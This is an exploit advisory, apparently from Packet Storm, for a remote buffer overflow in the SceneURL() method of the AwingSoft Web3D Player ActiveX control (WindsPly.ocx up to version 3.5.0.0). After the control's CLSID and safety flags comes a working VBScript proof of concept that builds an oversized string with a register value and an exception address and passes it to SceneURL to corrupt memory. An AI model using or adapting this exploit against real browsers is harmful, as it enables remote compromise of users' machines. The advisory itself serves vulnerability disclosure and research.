AwingSoft Web3D Player using WindsPly.ocx versions 3.5.0.0 and below suffer from a remote buffer overflow vulnerability in SceneURL().
29528d60369660c1e028650260c3b4e760bc9d8bbc3b599a7623f7fe8dfaae18-----------------------------------------------------------------------------
AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
url: http://www.awingsoft.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
Dedicated to aaannamariaaa :D
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
File: WindsPly.ocx
Ver.: <= 3.5.0.0
GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903}
ProgID: WindsPlayerIE.View.1
Marked as:
RegKey Safe for Script: Falso
RegKey Safe for Init: Falso
Implements IObjectSafety: Vero
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8
-----------------------------------------------------------------------------
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>
<script language='vbscript'>
buff = String(8704, "A")
mReg = unescape("bbbb")
mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
buf1 = String(88, "c")
buf2 = String(47284, "D")
test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed